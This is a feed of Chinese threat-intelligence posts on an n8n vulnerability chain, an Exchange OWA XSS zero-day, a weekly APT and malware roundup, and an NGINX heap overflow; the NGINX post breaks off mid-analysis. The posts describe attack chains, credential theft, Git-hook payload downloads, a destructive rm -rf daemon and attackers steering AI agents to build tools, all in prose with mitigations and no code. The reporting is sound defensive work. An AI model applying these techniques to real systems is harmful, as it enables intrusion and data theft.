奇安信威胁情报中心

n8n 自动化平台惊现三重漏洞链：低权限即可引爆完整 RCE，攻击面已蔓延至供应链核心节点

Tue, 19 May 2026 10:50:00 +0800

原创威胁情报中心 2026-05-19 10:50 北京

安全研究人员 Jubke 披露了 n8n 平台中一组可串联利用的高危漏洞。三个漏洞（CVE-2026-44789、CVE-2026-44790、CVE-2026-44791）分布在 HTTP Request 节点、Git 节点和 XML 节点中，组合后可实现完整的远程代码执行（RCE）。

事件概述

n8n 作为一款开源工作流程自动化平台，近年来在 DevOps 团队、SaaS 集成商以及中大型企业中迅速普及。其架构设计允许用户通过可视化方式串联 API、数据库、云服务和内部工具，构建高度自动化的业务流程。这种"核心枢纽"定位使其成为攻击者梦寐以求的目标——一旦攻陷平台本身，攻击者即可横向染指整个数据处理链。

奇安信威胁情报中心监测发现，安全研究人员 Jubke 披露了 n8n 平台中一组可串联利用的高危漏洞。三个漏洞（CVE-2026-44789、CVE-2026-44790、CVE-2026-44791）分布在 HTTP Request 节点、Git 节点和 XML 节点中，组合后可实现完整的远程代码执行（RCE）。更值得警惕的是，利用门槛极低——攻击者仅需拥有创建或编辑工作流程的基本权限，即可触发整条攻击链，完成从权限提升到服务器接管的全流程。

受影响版本如下：

n8n < 1.123.43
n8n < 2.20.7
n8n < 2.22.1

官方已在修复版本中完成补丁推送，建议所有使用 n8n 的企业立即核查部署版本，并优先完成升级。

漏洞技术分析

CVE-2026-44789：HTTP Request 节点原型污染

严重等级：Critical | CWE：CWE-1321（原型污染）| MITRE ATT&CK：T1203

该漏洞是三个漏洞中危害最为严重的一个，位于 n8n 的 HTTP Request 节点。问题根源在于分页参数校验存在缺陷，攻击者可以利用 JavaScript 原型污染（Prototype Pollution）技术向全局对象注入恶意属性。当受害实例上的其他工作流程被执行时，这些被污染的属性会触发意外行为，最终导致任意代码在服务器端执行。

原型污染在 JavaScript 应用安全领域并非新鲜事物，但在自动化平台场景下危害被显著放大。n8n 的工作流程通常处理来自多个外部源的动态数据，一旦攻击者通过原型污染篡改了核心对象的运行时行为，破坏效应会沿着工作流程的执行链路级联传播，影响范围远超单一工作流程本身。

从攻击向量来看，这是一个纯网络侧攻击（AV:N），无需任何用户交互，CVSS 评分达到高危区间。攻击者可以在不触发任何告警的情况下完成 exploit。

CVE-2026-44790：Git 节点命令行注入

严重等级：High | CWE：CWE-88（命令参数注入）| 关联 MITRE ATT&CK：T1059（命令与脚本解释器）

第二个漏洞影响 Git 节点。当 n8n 执行 Git push 操作时，用户输入的某些参数被直接拼接到命令行参数中，未经过充分的边界校验。攻击者利用这一缺陷，可以在 Git push 过程中注入恶意 CLI 参数，进而读取服务器上的任意文件。

这一漏洞的破坏力不容低估。通过文件读取，攻击者可获取敏感信息，包括但不限于：

配置文件中的数据库连接字符串
API 密钥和认证凭据
环境变量文件（.env）
SSH 私钥及其他密钥材料

一旦攻击者获取了这些凭据，后续行动空间将大幅扩展——从横向移动到持久化控制，威胁等级迅速攀升。

CVE-2026-44791：XML 节点补丁绕过

严重等级：High | CWE：CWE-1321（原型污染）

第三个漏洞是 XML 节点中早期安全修复的绕过。n8n 团队此前曾针对该节点的原型污染问题发布过补丁，但研究人员发现，通过替代数据路径仍可成功触发相同的污染行为。这意味着即便企业环境中已部署了之前的补丁，攻击者仍可利用这一绕过路径配合 CVE-2026-44789 实现完整的 RCE。

该漏洞的存在说明：在 JavaScript 运行时环境中，单一路径的修复不等于全局安全。"头痛医头"的修补策略在面对原型污染这类语言特性级别的漏洞时，往往难以根除问题。

攻击链解析：低权限如何撬开服务器大门

三个漏洞并非孤立存在，而是形成了一条完整的攻击链。以下是奇安信威胁情报团队还原的攻击路径：

第一步：立足。攻击者获取一个拥有工作流程创建/编辑权限的低权限账户。在多数企业环境中，DevOps 工程师、自动化管理员甚至部分业务人员都可能拥有这类权限。

第二步：污染。攻击者利用 CVE-2026-44789 在 HTTP Request 节点中构造恶意分页参数，通过原型污染向 JavaScript 全局对象注入恶意属性。这一步不需要任何管理员权限，仅利用节点本身的功能逻辑即可实现。

第三步：横向扩大。通过 CVE-2026-44791 绕过此前针对 XML 节点的安全修复，确保原型污染路径在多种数据处理场景下均可持续生效。

第四步：凭据窃取。利用 CVE-2026-44790 的命令行注入漏洞，通过 Git push 操作读取服务器上的敏感文件——配置、密钥、凭据统统落入攻击者手中。

第五步：全面接管。结合前几步获取的凭据和环境信息，攻击者可在服务器上执行任意代码，完成从"低权限用户"到"系统控制者"的权限跨越。整个过程静默高效，不会触发常规安全监控的告警阈值。

在典型的企业部署中，n8n 实例往往以服务账户或系统账户权限运行。一旦攻击者完成 RCE，其获得的不是普通用户权限，而是能够访问环境变量、配置文件乃至底层系统的更高权限级别。这使得后续的横向移动和数据窃取成本几乎为零。

威胁态势评估

平台普及度推高实际风险

n8n 的设计哲学强调灵活性和易用性。用户无需深厚的编程背景，即可通过可视化界面将 API、云服务、数据库等组件串联成自动化工作流程。这一定位直接导致了两个后果：

用户群体庞大且分散：开发团队、运维团队乃至业务团队都可能独立部署 n8n 实例，导致资产管理出现盲区。
连接范围广泛：n8n 通常持有大量第三方服务的 API 密钥、数据库访问凭据和环境配置信息，一旦被攻陷，攻击者获取的不只是一个平台，而是整个集成链条的访问权。

从奇安信全球威胁视野来看，这类处于供应链"中间位置"的自动化平台，正在成为高级威胁行为体优先关注的目标——控制一个枢纽节点的价值，远高于攻陷单个终端。

利用门槛与攻击烈度的错配

当前披露信息显示，这些漏洞需要"低权限认证"作为前置条件。但奇安信安全研究团队提醒，这一限制条件在实际企业环境中并不构成有效防护：

在许多组织中，"创建工作流程"的权限已广泛授予开发者和部分业务人员
n8n 的多用户协作特性意味着同一实例上往往存在多个具备编辑权限的账户
即使是内部用户，其账户被攻陷（如钓鱼攻击、凭据复用）的概率并不低

综合评估，实际可利用的攻击面远超实验室环境下的理想化评估。

公开 Exploit 预期

安全社区通常遵循"漏洞披露→研究验证→PoC 公开"的演进路径。鉴于这三个漏洞的利用复杂度相对可控（无需复杂的漏洞利用链），且 CVSS 评分一致处于高危区间，奇安信威胁情报中心研判，公开的漏洞利用代码（PoC/EXP）预计将在短期内出现。一旦公开代码可用，结合 n8n 在全球范围内的广泛部署，规模化攻击窗口将迅速打开。

MITRE ATT&CK 技战术映射

技术 ID	技术名称	攻击阶段	本事件关联
T1203	通过软件漏洞利用执行代码	初始访问/执行	CVE-2026-44789 原型污染触发 RCE
T1059	命令与脚本解释器	执行	CVE-2026-44790 命令行注入后执行任意命令
T1552	未安全存储的凭据	凭据访问	通过文件读取获取配置文件中的密钥
T1027	混淆文件或信息	防御规避	原型污染技术本身具有混淆效果
T1570	横向工具传输	横向移动	获取凭据后在其他系统展开行动

缓解建议

紧急措施（24-72 小时内）

立即升级：将所有 n8n 实例升级至 1.123.43、2.20.7、2.22.1 或更高版本。这是消除风险的最直接手段。
临时缓解：如无法立即升级，可通过设置环境变量 N8N_NODES_EXCLUDE 禁用 HTTP Request、Git 和 XML 节点，同时严格限制工作流程的创建和编辑权限仅授予最小必要人员。
权限审查：审计所有拥有工作流程编辑权限的账户，撤销非必要权限，启用多因素认证（MFA）。

中期加固（1-2 周内）

在 n8n 实例前部署 Web 应用防火墙（WAF），对工作流程配置接口的异常请求进行检测和阻断
建立 n8n 版本管理机制，确保所有节点版本始终处于官方支持的最新稳定分支
对 n8n 实例的网络访问进行精细化控制，限制其仅能访问必要的下游服务

长期安全建设

将 n8n 实例纳入配置管理（CMDB）系统，确保所有部署实例无遗漏
在 CI/CD 流程中集成安全扫描环节，对自动化工作流程的配置进行合规性检查
建立威胁情报订阅机制，第一时间获取相关漏洞的公开利用情报

奇安信威胁情报说明

奇安信威胁情报中心持续监控全球范围内的漏洞披露和威胁活动。本次 n8n 漏洞事件中涉及的三个 CVE 均已纳入奇安信威胁情报库，具备以下检测能力：

相关漏洞的规则匹配和告警
原型污染技术的特征检测
命令行注入行为的日志分析规则

当前未发现针对该漏洞的已知 APT 组织归因信息，但基于漏洞利用的便利性和平台战略价值，高级别威胁行为体（APT）可能在未来将其纳入攻击工具库。建议安全团队保持关注。

IOC 与关联指标

本次披露的漏洞为设计缺陷类漏洞，未涉及传统意义上的失陷指标（IOC），如恶意文件哈希、恶意域名等。核心关注点应聚焦于受影响的版本范围和漏洞类型，而非文件级指标。

实体/指标	类型	说明
CVE-2026-44789	CVE	HTTP Request 节点原型污染，RCE
CVE-2026-44790	CVE	Git 节点命令行注入，任意文件读取
CVE-2026-44791	CVE	XML 节点补丁绕过，原型污染延续
n8n < 1.123.43	版本范围	主线版本受影响
n8n < 2.20.7	版本范围	2.x 分支受影响
n8n < 2.22.1	版本范围	2.x 分支受影响
T1203	ATT&CK	利用软件漏洞执行代码
T1059	ATT&CK	命令与脚本解释器
CWE-1321	CWE	原型污染
CWE-88	CWE	命令行参数注入
Jubke	研究人员	漏洞发现者

参考来源

阅读原文

跳转微信打开

紧急！微软Exchange Server新高危XSS漏洞（CVE-2026-42897）已被利用执行攻击

Mon, 18 May 2026 11:32:00 +0800

原创威胁情报中心 2026-05-18 11:32 北京

微软于近期披露了一个影响广泛的高危零日漏洞CVE-2026-42897，该漏洞已被确认在野外被积极利用。

事件概述

微软于近期披露了一个影响广泛的高危零日漏洞CVE-2026-42897，该漏洞已被确认在野外被积极利用。

这个漏洞来得猝不及防——就在微软发布包含137个漏洞修复的补丁星期二更新后仅仅两天，安全研究人员便发现了这个此前未知的零日漏洞。漏洞影响Microsoft Exchange Server的多个版本，包括Subscription Edition、2016版和2019版的本地部署版本。

奇安信威胁情报中心监测显示，该漏洞的CVSS评分高达8.1（高危），属于典型的欺骗类漏洞，同时具备跨站脚本(XSS)攻击能力。攻击者无需特殊权限，即可通过精心构造的恶意邮件触发漏洞，在目标用户的浏览器上下文中执行任意JavaScript代码。

关键结论：虽然该漏洞目前尚未被CISA纳入已知被利用漏洞（KEV）目录，但微软已明确表示存在活跃的野外利用，这使得该漏洞的紧迫程度不容低估。

技术分析与攻击链路

漏洞根因

CVE-2026-42897的技术本质是输入验证不当导致的跨站脚本漏洞。问题出在Exchange Server的Outlook Web Access（OWA）组件中——当Web应用程序生成页面时，对用户可控输入的过滤和中和处理存在缺陷。

从攻击链角度分析，该漏洞属于MITRE ATT&CK框架中的以下技术类别：

T1189：路过式下载（初始访问）
T1059.007：JavaScript执行（命令和脚本执行）
T1566.002：鱼叉式钓鱼邮件（网络钓鱼）

攻击路径还原

结合多来源情报，该漏洞的完整攻击链路如下：

第一步：投递阶段

攻击者构造包含恶意载荷的特殊邮件。这里的"特殊"在于，邮件内容中嵌入了精心设计的脚本代码，当邮件通过OWA界面渲染时，这些代码会存在于页面DOM中。

第二步：触发阶段

目标用户使用Outlook Web Access打开邮件。需要注意的是，漏洞触发可能需要特定的用户交互条件，如鼠标悬停、点击邮件中的某个元素，或页面滚动到特定位置。这解释了为什么部分来源提到"under certain conditions"。

第三步：代码执行

当条件满足时，攻击者注入的JavaScript代码在用户浏览器上下文中执行。这意味着恶意代码拥有与当前登录用户相同的会话权限，可以：

读取用户可见的所有邮件内容
窃取会话Cookie，实现会话劫持
提取OWA界面中的敏感数据
构造进一步的攻击载荷

第四步：后继行动

成功利用后，攻击者可进一步实施：

横向移动至企业内网其他系统
凭据窃取和权限提升
数据外泄
部署后续攻击工具

漏洞技术特征对比

属性	详情
CVE编号	CVE-2026-42897
漏洞类型	欺骗漏洞 + 跨站脚本(XSS)
CVSS评分	8.1（高危）
影响范围	Exchange Server SE/2016/2019（本地部署）
利用前提	需向用户发送特制邮件
触发条件	用户在OWA中打开邮件并满足特定交互
Exchange Online	不受影响

威胁态势评估

野外利用确认

该漏洞已被明确标注为"在野外被积极利用"。微软安全响应中心发布的官方公告也明确指出这一点，这与部分报道中"尚未被CISA KEV收录"的描述并不矛盾——CISA的收录存在一定滞后性，但漏洞的实际危害已经发生。

该漏洞由匿名安全研究人员发现并私下报告，而非通过微软的漏洞赏金计划或公开渠道披露。这种报告方式往往意味着漏洞信息可能已在更广泛的范围内流传，攻击者可能比公众更早知晓相关细节。

历史脉络与威胁演进

CVE-2026-42897并非微软Exchange Server首次出现的高危漏洞。回顾近年来Exchange Server的安全事件：

2019-2020年：Exchange的黑暗时期

CVE-2020-0688：Exchange控制面板远程代码执行
CVE-2021-26855至CVE-2021-27065（ProxyLogon）：大规模APT攻击利用
CVE-2021-34473至CVE-2021-42321（ProxyShell）：类似攻击链的演进

2021-2024年：持续高压

据HEAL Security报告，CISA数据显示过去五年间已有19个微软Exchange Server漏洞被添加到已知被利用漏洞目录，其中14个被明确用于勒索软件攻击。

CVE-2026-42897的攻击模式与早期的ProxyLogon、ProxyShell漏洞存在相似性——都是通过OWA界面作为入口，利用服务器端组件的处理缺陷实现攻击链的延伸。这种"邮件入口+服务端利用"的组合拳，一直是APT组织和经济利益驱动型攻击者的最爱。

关联威胁活动

据HEAL Security同期监测，APT组织正在全球范围内针对制造业和供应链企业部署名为TencShell的新型恶意软件。虽然目前没有直接证据表明TencShell与CVE-2026-42897存在关联，但这种时间线上的巧合值得关注——国家级APT组织通常会优先储备和利用高价值零日漏洞，而Exchange Server作为企业核心通信平台，一直是这类组织的优先目标。

国内影响分析

受影响范围

国内使用微软Exchange Server本地部署版本的用户群体主要集中在以下行业：

大型企业：尤其是外资企业和跨国公司的国内分支机构
政府机构：部分党政机关曾使用Exchange作为邮件系统
金融机构：银行、证券、保险等行业存在一定部署量
高校和科研机构：学术邮箱系统常用Exchange架构

需要指出的是，近年来国内信创替代进程加速，越来越多的政府机关和关键信息基础设施运营单位已将邮件系统迁移至国产解决方案，这在一定程度上降低了个体风险。

当前威胁等级

对于国内普通企业用户：短期内的直接威胁相对可控，原因包括：该漏洞利用需要发送特制邮件针对性投递、Exchange Server国内部署量呈下降趋势、国内邮箱系统存在额外的安全防护层。

对于高价值目标：风险等级维持在高水平。APT组织历来重视对Exchange Server漏洞的储备和利用，任何在野0day都可能已被纳入攻击工具库。金融、政府、关键基础设施等行业的Exchange Server用户应视为优先防护对象。

防御建议

立即行动（24小时内）：

确认当前Exchange Server版本，确认是否在受影响范围内
检查是否已启用Exchange Emergency Mitigation Service (EEMS)
审查OWA访问日志，关注异常的邮件访问行为
对Exchange Server管理员账户实施额外的多因素认证

短期措施（1周内）：

限制OWA的外部访问，仅保留必要的业务通道
加强邮件网关的入站检查规则，对异常HTML邮件内容实施过滤
向安全运营团队通报该漏洞，要求提高威胁监测级别
制定紧急补丁部署计划，一旦微软发布官方修复，立即部署

中长期建议：

加速Exchange Server向云端Exchange Online或国产邮件系统的迁移
建立Exchange Server的持续安全监测机制
定期开展邮件系统安全评估和渗透测试

微软官方缓解措施

微软已发布临时缓解指导，核心措施包括：

Exchange Emergency Mitigation Service (EEMS)

这是微软为Exchange Server提供的紧急缓解服务，类似于自动化的安全补丁机制。启用EEMS后，当微软推送特定漏洞的缓解规则时，Exchange Server会自动应用这些规则，无需管理员手动干预。

建议操作步骤：

确保Exchange Server的EEMS服务处于启用状态
检查Windows Server上的Microsoft Exchange Mitigation Service运行状态
应用微软建议的URL重写规则，对OWA请求进行过滤

微软表示永久修复补丁正在开发中，但目前无法给出具体时间表。这种"补丁在路上"的状态预计将持续数周，期间组织需要依靠缓解措施和持续监控来降低风险。

总结与展望

CVE-2026-42897的出现再次提醒我们，微软Exchange Server作为企业通信的核心基础设施，其安全性始终是攻防博弈的焦点。该漏洞的高CVSS评分、已确认的野外利用、以及被APT组织青睐的历史传统，共同构成了的威胁态势。

国内用户虽然当前面临的紧迫风险相对可控，但不应放松警惕。国家级APT组织对高价值目标的持续关注，意味着任何0day漏洞都可能在某个时刻被"激活"。组织应借此机会重新审视自身的Exchange Server安全态势，加速向更安全的架构迁移，同时保持对类似漏洞情报的持续关注。

最后提醒，安全是一场持久战，而非遭遇战。保持警惕，持续监测，果断响应，才是应对这类安全事件的正确姿势。

参考来源

阅读原文

跳转微信打开

每周高级威胁情报解读(2026.05.08~05.14)

Fri, 15 May 2026 10:30:00 +0800

威胁情报中心 2026-05-15 10:30 北京

EasterBunny：归因于APT29的高级间谍工具；Kimsuky组织依托GitHub+Dropbox分发恶意载荷；Lazarus Group 利用 Git 钩子隐藏恶意软件；Paper Werewolf使用新工具包针对俄罗斯工业、金融和运输组织；Gamaredon的感染链：伪造电子邮件、GammaDrop和GammaLoad

2026.05.08~05.14

攻击团伙情报

EasterBunny：归因于 APT29 的高级间谍工具
Kimsuky组织依托GitHub+Dropbox分发恶意载荷的攻击活动分析
Lazarus Group 利用 Git 钩子隐藏恶意软件
Paper Werewolf 使用新工具包针对俄罗斯工业、金融和运输组织
Gamaredon的感染链：伪造电子邮件、GammaDrop和GammaLoad
Seedworm 入侵韩国电子制造商

攻击行动或事件情报

两项人工智能增强型威胁活动瞄准拉丁美洲政府和金融部门
富士康证实遭到Nitrogen勒索软件团伙的网络攻击
42个TanStack包遭供应链劫持：6分钟植入84个恶意版本
Gentlemen 勒索软件遭到入侵
秘密活动6年的神秘黑客组织Mr_Rot13正在利用cPanel高危漏洞部署后门木马
某加密IM官网供应链事件，“离岸”爱国者卷土重来

恶意代码情报

黑客滥用谷歌广告和 Claude.ai 聊天功能推送 Mac 恶意软件
恶意模仿 Anthropic 的 Claude 网站会导致后门植入
AD CS 升级内幕：剖析高级滥用技术和工具
AI软件仿冒攻击再现，DeepSeek TUI成伪装诱饵

漏洞情报

微软补丁日通告：2026年5月版

攻击团伙情报

EasterBunny：归因于 APT29 的高级间谍工具

披露时间：2026年5月6日

情报来源：https://lab52.io/blog/wp-content/uploads/2026/05/LAB52EasterBunny.pdf

相关信息：

EasterBunny是APT29组织高度定制化的模块化后门，采用多层嵌套加载器与位置无关代码，利用目标机器的BIOS UUID、MachineGuid等系统特征生成解密密钥，使样本仅能在指定主机上运行，有效对抗沙箱和逆向分析。通信流量伪装成Google广告的Cookie字段和JavaScript脚本，支持通过C2下发模块动态加载DCSync等凭证窃取功能，实现持久化情报收集与后门控制。

Kimsuky组织依托GitHub+Dropbox分发恶意载荷的攻击活动分析

披露时间：2026年5月13日

情报来源：https://mp.weixin.qq.com/s/Ibz3FeA7twg-VCujA3cV_g

相关信息：

Kimsuky组织通过伪装成访谈文档的LNK文件发起钓鱼攻击，利用PowerShell脚本从自身解密并打开诱饵文档以迷惑受害者，同时从Dropbox和GitHub下载多阶段VBS和PowerShell载荷，最终以反射加载方式执行AsyncRAT变种。该木马采用插件化架构，按需加载功能模块，收集主机信息后回传至C2服务器，攻击者通过GitHub仓库存储加密载荷和测试样本，实现持续化的隐蔽控制。

Lazarus Group 利用 Git 钩子隐藏恶意软件

披露时间：2026年5月6日

情报来源：https://opensourcemalware.com/blog/dprk-git-hooks-malware

相关信息：

Lazarus组织在其Contagious Interview/TaskJacker活动中，将恶意载荷的投放方式从以往利用VS Code的tasks.json或package.json postinstall脚本，转向隐藏在Git钩子中。攻击者通过伪造的加密货币或DeFi技术面试机会，诱导开发者克隆包含恶意pre-commit钩子的代码仓库，当候选人首次尝试提交代码时，钩子脚本自动执行，根据操作系统从precommit.vercel.app下载并运行对应的第二阶段载荷（最终投放InvisibleFerret或BeaverTail木马），用于窃取加密货币钱包和浏览器凭证。该手法利用了开发者对Git钩子等常规工具的信任，同时规避了微软对VS Code自动执行任务逐步加强的限制。

Paper Werewolf 使用新工具包针对俄罗斯工业、金融和运输组织

披露时间：2026年5月13日

情报来源：https://bi-zone.medium.com/tinker-tailor-soldier-paper-werewolfs-latest-toolkit-3a4bb578880e

相关信息：

Paper Werewolf组织在2026年3月至4月期间针对俄罗斯工业、金融和运输机构发起钓鱼攻击，使用包含恶意链接的PDF诱饵，通过Inno Setup安装器释放EchoGather远控木马和PDF诱饵文档。该组织还部署了自定义PaperGrabber窃取器，用于收集本地、网络和可移动驱动器中的文件，窃取浏览器凭证和Telegram数据，并采用JS、Python、C++等多阶段下载器与Mythic框架植入物进行隐蔽通信和载荷执行。

Gamaredon的感染链：伪造电子邮件、GammaDrop和GammaLoad

披露时间：2026年5月13日

情报来源：https://harfanglab.io/insidethelab/gamaredon-gammadrop-gammaload/

相关信息：

Gamaredon组织自2025年9月起利用CVE-2025-8088路径遍历漏洞，通过伪造或劫持的乌克兰政府邮箱发送鱼叉邮件，附件中的RAR压缩包将恶意VBScript释放到启动文件夹实现持久化。第一阶段GammaDrop从Cloudflare Workers获取GammaLoad（HTA），后者作为C2信标收集计算机名、卷序列号等信息，使用User-Agent嵌入受害标识并循环请求，若主C2无响应则回退至备用域名，最终可选择性下发下一阶段载荷。该活动截至2026 年 5 月仍处于活跃状态，高度针对乌克兰国家安全机构。

Seedworm 入侵韩国电子制造商

披露时间：2026年5月12日

情报来源：https://www.security.com/threat-intelligence/iran-seedworm-electronics

相关信息：

伊朗关联的APT组织Seedworm在2026年第一季度针对全球至少九个组织实施间谍活动，涉及韩国电子制造商、中东政府机构、东南亚工业制造、拉丁美洲金融等多个领域。攻击者利用合法签名的Fortemedia和SentinelOne二进制文件进行DLL侧载，通过Node.js脚本和PowerShell执行侦查、截图、SAM劫持、权限提升及SOCKS5隧道，并将窃取的数据通过公共文件传输服务sendit.sh外泄。

攻击行动或事件情报

两项人工智能增强型威胁活动瞄准拉丁美洲政府和金融部门

披露时间：2026年5月11日

情报来源：https://www.trendmicro.com/en_us/research/26/e/vibe-hacking-two-ai-augmented-campaigns-target-government-and-financial-sectors-in-latin-america.html

相关信息：

两个拉丁美洲攻击活动SHADOW-AETHER-040和SHADOW-AETHER-064分别针对政府与金融机构，均利用AI代理辅助入侵。攻击者通过ProxyChains和SSH隧道建立流量通道，命令AI代理动态生成扫描、漏洞利用、凭据收集等工具和脚本，而非依赖预置黑客工具。前者使用西班牙语，部署了AI生成的Python后门implante_http；后者使用葡萄牙语，开发了SOCKTZ隧道工具。AI辅助攻击能够快速分析配置文件和日志，动态生成绕过传统检测的恶意代码，提升攻击效率。

富士康证实遭到Nitrogen勒索软件团伙的网络攻击

披露时间：2026年5月13日

情报来源：https://www.bleepingcomputer.com/news/security/electronics-giant-foxconn-confirms-cyberattack-on-north-american-factories/

相关信息：

2026 年 5 月 13 日，全球最大电子代工厂富士康确认其北美厂区遭Nitrogen 勒索软件团伙网络攻击，该团伙宣称窃取8TB 数据、超 1100 万份文档，涉及苹果、英特尔、谷歌、英伟达等客户机密资料；富士康已启动应急响应，受影响厂区正逐步恢复生产，这也是富士康近年第三次遭遇重大勒索软件攻击。

42个TanStack包遭供应链劫持：6分钟植入84个恶意版本

披露时间：2026年5月13日

情报来源：https://mp.weixin.qq.com/s/3VT15mDrwYQtJ4xgq_mB6w

相关信息：

攻击者利用GitHub Actions的pull_request_target工作流、缓存中毒及OIDC令牌内存提取技术，在6分钟内劫持TanStack的42个npm包发布管道，植入84个恶意版本。恶意载荷router_init.js窃取开发者凭证，并通过@tanstack/setup的prepare钩子实现持久化，同时部署gh-token-monitor守护进程，在检测到令牌撤销时执行rm -rf删除主目录。攻击归因于TeamPCP组织，影响波及React Router等周下载量超千万的核心包，并扩展至PyPI生态。

Gentlemen 勒索软件遭到入侵

披露时间：2026年5月13日

情报来源：https://research.checkpoint.com/2026/thus-spoke-the-gentlemen/

相关信息：

The Gentlemen勒索软件即服务运营的内部数据库遭泄露，曝光了管理员Zeta88（又称hastalamuerte）及至少8个关联分支机构的TOX ID。泄露的聊天记录揭示了该组织的操作流程：通过Fortinet和Cisco边缘设备、NTLM中继等初始访问，使用NetExec、RelayKing等工具集进行横向移动和权限提升，利用CVE-2024-55591、CVE-2025-32433等漏洞，结合EDR绕过和日志篡改技术，最终部署勒索软件。谈判中曾获19万美元赎金，并利用从英国软件咨询公司窃取的数据进一步攻击土耳其企业。

秘密活动6年的神秘黑客组织Mr_Rot13正在利用cPanel高危漏洞部署后门木马

披露时间：2026年5月11日

情报来源：https://blog.xlab.qianxin.com/mr_rot13-the-elusive-6-year-hacker-group-weaponizing-critical-cpanel-flaws-for-backdoor-deployment_cn/

相关信息：

一个名为Mr_Rot13的神秘黑客组织已秘密活动六年，近期利用cPanel高危漏洞CVE-2026-41940部署后门木马。该组织使用Go编写的Payload感染器修改系统密码、植入SSH公钥、PHP Webshell及Rot13编码的恶意JS脚本以窃取登录凭证，并部署跨平台远控Filemanager，同时将窃取的系统信息回传至C2服务器和Telegram群组。该组织基础设施自2020年起长期保持低检测率，至今仍未被完全揭露。

某加密IM官网供应链事件，“离岸”爱国者卷土重来

披露时间：2026年5月5日

情报来源：https://mp.weixin.qq.com/s/KBUCVEVLF-cMR4ePHBRw2w

相关信息：

攻击者替换某加密即时通讯软件的官方安装包，释放恶意组件并内存加载SNOWLIGHT下载者，最终运行魔改的nps隧道以建立隐蔽通道。该活动涉及Windows和Linux平台，利用SQL爆破、漏洞入侵、钓鱼LNK等方式分发载荷，并结合浏览器窃密、内网扫描、权限提升等工具，形成持续渗透能力。

恶意代码情报

黑客滥用谷歌广告和 Claude.ai 聊天功能推送 Mac 恶意软件

披露时间：2026年5月10日

情报来源：https://www.bleepingcomputer.com/news/security/hackers-abuse-google-ads-claudeai-chats-to-push-mac-malware/

相关信息：

攻击者通过Google广告诱导用户访问真实的Claude.ai网站，但利用Claude平台共享聊天功能展示伪造的安装教程，诱骗macOS用户复制终端命令，下载并执行MacSync信息窃取变种。恶意脚本会检查俄语键盘布局以规避特定区域，否则窃取浏览器凭证、Keychain等敏感数据并外传。

恶意模仿 Anthropic 的 Claude 网站会导致后门植入

披露时间：2026年5月7日

情报来源：https://www.sophos.com/en-us/blog/donuts-and-beagles-fake-claude-site-spreads-backdoor

相关信息：

攻击者通过伪造的Claude AI网站claude-pro.com分发恶意MSI安装包，利用DLL侧载技术执行DonutLoader载荷，最终解密并加载此前未记录的后门Beagle。该后门支持文件操作、命令执行等基本功能，通信采用AES加密。相关样本复用相同XOR密钥，表明可能存在持续化或模仿行为。

AD CS 升级内幕：剖析高级滥用技术和工具

披露时间：2026年5月11日

情报来源：https://origin-unit42.paloaltonetworks.com/active-directory-certificate-services-exploitation/

相关信息：

Active Directory Certificate Services因默认配置不当和证书模板权限设置过松，成为权限提升与身份伪造的高风险攻击面。攻击者利用低权限用户可申请高权限模板、允许请求者指定主体名称等错误配置，通过Certipy、Certify等工具枚举并请求伪造证书，结合PKINIT获取Kerberos票据实现权限提升；同时通过操纵msDS-KeyCredentialLink属性植入影子凭证，实现持久的无密码访问。

AI软件仿冒攻击再现，DeepSeek TUI成伪装诱饵

披露时间：2026年5月9日

情报来源：https://mp.weixin.qq.com/s/SPN25Z4cLCHu7bEhVYTSNQ

相关信息：

攻击者利用DeepSeekTUI开源项目的热度，在GitHub上创建仿冒仓库，通过Releases页面投递恶意安装包。恶意样本采用分层评分机制和鼠标移动检测等反沙箱技术，通过检测后执行PowerShell脚本关闭Windows Defender防御并开放入站端口，随后从Azure DevOps、Pastebin等平台下载多个二阶段组件。这些组件具备计划任务与注册表持久化、CLR内存加载.NET程序集、NT系统调用注入等能力，最终与C2通信。该活动与先前仿冒OpenClaw的攻击具有相同特征代码和基础设施重叠，表明存在一个持续利用AI热点话题投递恶意软件的攻击团伙。

漏洞情报

微软补丁日通告：2026年5月版

披露时间：2026年5月13日

情报来源：https://mp.weixin.qq.com/s/2ErpPdqHXNjmqfCGROj2Cg

相关信息：

微软2026年5月补丁日共发布137个漏洞补丁，其中23个值得重点关注，包括14个紧急漏洞和9个重要漏洞，涉及Microsoft Word远程代码执行、Windows图形组件、Hyper-V权限提升、SharePoint Server、Netlogon、DNS客户端等产品。多个漏洞已被标记为已遭利用或更易被利用，建议用户尽快安装更新。

点击阅读原文至ALPHA 9.3

即刻助力威胁研判

跳转微信打开

18年积弊：NGINX脚本引擎堆缓冲区溢出可致远程代码执行

Thu, 14 May 2026 18:27:00 +0800

原创威胁情报中心 2026-05-14 18:27 北京

2026年初，安全研究组织depthfirst通过其自动化代码审计系统对NGINX源代码进行深度扫描，识别出五个安全缺陷，其中四个已获得NGINX官方确认并分配CVE编号。这一发现揭示了NGINX核心组件中存在的严重内存损坏问题，攻击者可利用这些漏洞实现远程代码执行

漏洞概述

2026年初，安全研究组织depthfirst通过其自动化代码审计系统对NGINX源代码进行深度扫描，在六小时内识别出五个安全缺陷，其中四个已获得NGINX官方确认并分配CVE编号。这一发现揭示了NGINX核心组件中存在的严重内存损坏问题，攻击者可利用这些漏洞实现远程代码执行。

关键CVE清单：

CVE编号	严重性	漏洞类型	影响组件
CVE-2026-42945	Critical (9.2)	堆缓冲区溢出	ngx_http_rewrite_module
CVE-2026-42946	High (8.3)	过度内存分配	ngx_http_scgi_module, ngx_http_uwsgi_module
CVE-2026-40701	Medium (6.3)	释放后使用	ngx_http_ssl_module
CVE-2026-42934	Medium (6.3)	越界读取	ngx_http_charset_module

CVE-2026-42945作为该批次中最严重的漏洞，CVSS评分高达9.2，漏洞代码于2008年引入，跨越近18年未被发觉，影响范围覆盖NGINX Open Source 0.6.27至1.30.0版本以及NGINX Plus R32至R36版本。该漏洞的利用门槛较低，在禁用ASLR的环境中已验证可实现可靠的远程代码执行。

技术根因分析

脚本引擎两遍处理机制

NGINX配置中的rewrite指令和set指令是构建API网关和请求路由的核心组件。rewrite指令允许通过正则表达式修改请求URI，当替换字符串包含问号时，NGINX将问号后的内容作为查询字符串处理。set指令则用于将值赋给自定义变量，支持捕获组的引用，这两个指令的组合使用极为普遍。

NGINX内部通过脚本引擎（script engine）优化这些操作。在配置解析阶段，脚本引擎将这些指令编译为操作序列；在运行时，通过两遍（two-pass）机制执行：首先计算最终字符串的总长度，从内存池分配精确大小的缓冲区；随后执行复制操作将实际数据写入新分配的缓冲区。这种设计避免了多次小额内存分配的性能开销，但要求两遍之间的引擎状态保持一致。

is_args标志传播失效

